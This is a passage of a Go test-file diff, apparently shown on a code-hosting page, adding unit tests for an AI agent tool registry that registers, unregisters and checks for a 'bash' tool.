if ok {
|
||||
t.Error("expected bash to be disabled")
|
||||
if r.Count() != 0 {
|
||||
t.Errorf("expected 0 tools with bash disabled, got %d", r.Count())
|
||||
}
|
||||
}
|
||||
|
||||
@@ -192,3 +177,47 @@ func TestWebSearchTool_Schema(t *testing.T) {
|
||||
t.Error("expected 'query' property in schema")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Unregister(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
r.Register(&BashTool{})
|
||||
|
||||
if r.Count() != 1 {
|
||||
t.Errorf("expected 1 tool, got %d", r.Count())
|
||||
}
|
||||
|
||||
r.Unregister("bash")
|
||||
|
||||
if r.Count() != 0 {
|
||||
t.Errorf("expected 0 tools after unregister, got %d", r.Count())
|
||||
}
|
||||
|
||||
_, ok := r.Get("bash")
|
||||
if ok {
|
||||
t.Error("expected bash tool to be removed")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_Has(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
|
||||
if r.Has("bash") {
|
||||
t.Error("expected Has to return false for unregistered tool")
|
||||
}
|
||||
|
||||
r.Register(&BashTool{})
|
||||
|
||||
if !r.Has("bash") {
|
||||
t.Error("expected Has to return true for registered tool")
|
||||
}
|
||||
}
|
||||
|
||||
func TestRegistry_RegisterBash(t *testing.T) {
|
||||
r := NewRegistry()
|
||||
|
||||
r.RegisterBash()
|
||||
|
||||
if !r.Has("bash") {
|
||||
t.Error("expected bash tool to be registered")
|
||||
}
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user